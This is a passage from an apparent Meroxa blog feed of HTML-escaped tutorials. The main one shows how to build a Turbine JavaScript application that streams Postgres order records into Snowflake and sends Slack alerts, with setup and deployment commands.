&lt;h2&gt;What&apos;s next?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#whats-next&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;In this guide, we have covered the basics of how to build a data application and deploy to Meroxa. This application will move data from your PostgreSQL database to your Algolia index.&lt;/p&gt;
&lt;p&gt;Here are some additional resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine&quot;&gt;Real-time Data Lake Ingestion with Turbine&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine&quot;&gt;Real-time eCommerce Order Data Warehousing and Alerting with Turbine&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can&apos;t wait to see what you build 🚀. If you have any questions or feedback:&lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Join the Community&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-time eCommerce Order Data Warehousing and Alerting with Turbine]]></title><description><![CDATA[Use Turbine, Meroxa's stream processing application framework, to perform real-time e-commerce Order Data warehousing and alerting.]]></description><link>https://meroxa.com/blog/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:50:00 GMT</pubDate><content:encoded>&lt;p&gt;Data warehouses like&lt;a href=&quot;https://www.snowflake.com/data-warehousing-glossary/data-warehousing/&quot;&gt;Snowflake&lt;/a&gt; allow you to collect and store data from multiple sources so that it can be accessed and analyzed. Real-time data warehousing is essential for e-commerce because it allows for up-to-the-minute analysis of customer behavior. In addition, the same data could be used to generate alerts about successful orders or potential fraud.&lt;/p&gt;
&lt;p&gt;An approach often used to solve this problem is to use two entirely different tools: one tool to ingest into a data warehouse and another to make use of reverse ETL to perform alerting from data that&apos;s being activated within the data warehouse itself. However, this is difficult to maintain and can be a costly process.&lt;/p&gt;
&lt;p&gt;Instead, you can use just Turbine to perform both real-time warehousing and alerting to Slack.&lt;/p&gt;
&lt;p&gt;Here is what a Turbine Application looks like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;pg&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendAlert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;snowflake&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This application uses&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, but Turbine also has&lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;,&lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt; and&lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; libraries.&lt;/p&gt;
&lt;p&gt;Here is a quick overview of the steps we will take to get started:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How it works?&lt;/li&gt;
&lt;li&gt;Setup&lt;/li&gt;
&lt;li&gt;Data Application Entrypoint&lt;/li&gt;
&lt;li&gt;Running&lt;/li&gt;
&lt;li&gt;Deployment&lt;/li&gt;
&lt;li&gt;What&apos;s next?&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;How it works?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#how-it-works&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A data application responds to events from your data infrastructure. You can learn more about the anatomy of a Javascript data application in the&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine-e6ab5a1ed3f2bf015fa12992bd336d88.png&quot; alt=&quot;Application Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This data application will:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Listen to&lt;a href=&quot;https://medium.com/meroxa/stream-your-database-changes-with-change-data-capture-aa8797fa9070&quot;&gt;Create, Update, and Delete&lt;/a&gt; events from a Postgres database. This is where the orders are stored.&lt;/li&gt;
&lt;li&gt;Write the order data to Snowflake.&lt;/li&gt;
&lt;li&gt;Send an alert to Slack when an order is created.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#setup&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Before we begin, you need to setup a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples&quot;&gt;Clone the example to your local machine&lt;/a&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; clone git@github.com:meroxa/turbine-js-examples.git&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since this example uses Javascript, you will need to have&lt;a href=&quot;https://nodejs.org/&quot;&gt;Node.js&lt;/a&gt; installed.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Copy the&lt;code class=&quot;language-text&quot;&gt;ecommerce-order-alerting&lt;/code&gt; directory to your local machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;cp&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; ~/turbine-js-examples/ecommerce-order-alerting ~/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Install NPM dependencies:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; ecommerce-order-alerting&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;npm&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to build.&lt;/p&gt;
&lt;h3&gt;Data Application Entrypoint&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#data-application-entrypoint&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; sendSlackMessage &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./alert.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;sendAlert&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;payload
            &lt;span class=&quot;token function&quot;&gt;sendSlackMessage&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;pg&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendAlert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;snowflake&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Running&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#running&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Next, you may run your data application locally:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app run&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Turbine will uses&lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart#run-a-streaming-app-locally&quot;&gt;fixtures to simulate your data&lt;/a&gt; infrastructure locally. This allows you to test without having to worry about the infrastructure. Fixtures are JSON-formatted data records you can develop against locally. To customize the fixtures for your application, you can find them in the&lt;code class=&quot;language-text&quot;&gt;fixtures&lt;/code&gt; directory.&lt;/p&gt;
&lt;h3&gt;Deployment&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#deployment&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;After you test the behavior locally, you can deploy it to Meroxa.&lt;/p&gt;
&lt;p&gt;Meroxa is the data platform to run and execute your Turbine apps. Meroxa takes care of maintaining the connection to your database and executing your application as changes. All you need to worry about is the data application itself.&lt;/p&gt;
&lt;p&gt;Here is how you deploy:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Add a PostgreSQL resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create postgresql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/snowflake&quot;&gt;Add a Snowflake data warehouse resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create snowflake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; snowflakedb &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;snowflake://&lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_URL&lt;/span&gt;/meroxa_db/stream_data&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--username&lt;/span&gt; meroxa_user &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--password&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_PRIVATE_KEY&lt;/span&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Deploy to Meroxa:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, as changes are made to the upstream data infrastructure, your data application will be executed.&lt;/p&gt;
&lt;h3&gt;What&apos;s next?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#whats-next&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;That&apos;s it! Your data application is now running. You can now verify the data in your Data Warehouse.&lt;/p&gt;
&lt;p&gt;We can&apos;t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback:&lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Join the Community&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-time Data Lake Ingestion with Turbine]]></title><description><![CDATA[Turbine offers a code-first approach to building real-time data lake ingestion systems. Build, review, and test data products with a developer's mindset. ]]></description><link>https://meroxa.com/blog/real-time-data-lake-ingestion-with-turbine</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-data-lake-ingestion-with-turbine</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:37:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://aws.amazon.com/big-data/datalakes-and-analytics/what-is-a-data-lake/&quot;&gt;Data lakes&lt;/a&gt; have become a popular method of storing data and performing analytics.&lt;a href=&quot;https://aws.amazon.com/s3/&quot;&gt;Amazon S3&lt;/a&gt; offers a flexible, scalable way to store data of all types and sizes, and can be accessed and analyzed by a variety of tools.&lt;/p&gt;
&lt;p&gt;Real-time data lake ingestion is the process of getting data into a data lake in near-real-time. Today, this can be accomplished by using streaming data platforms, message queues, and event-driven architectures, but these are very complex systems.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine&lt;/a&gt; offers a code-first approach to building real-time data lake ingestion systems. This allows you to build, review, and test data products with a software engineering mindset. In this guide, you will learn how to use Turbine to ingest data into Amazon S3.&lt;/p&gt;
&lt;p&gt;Here is what a Turbine Application looks like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

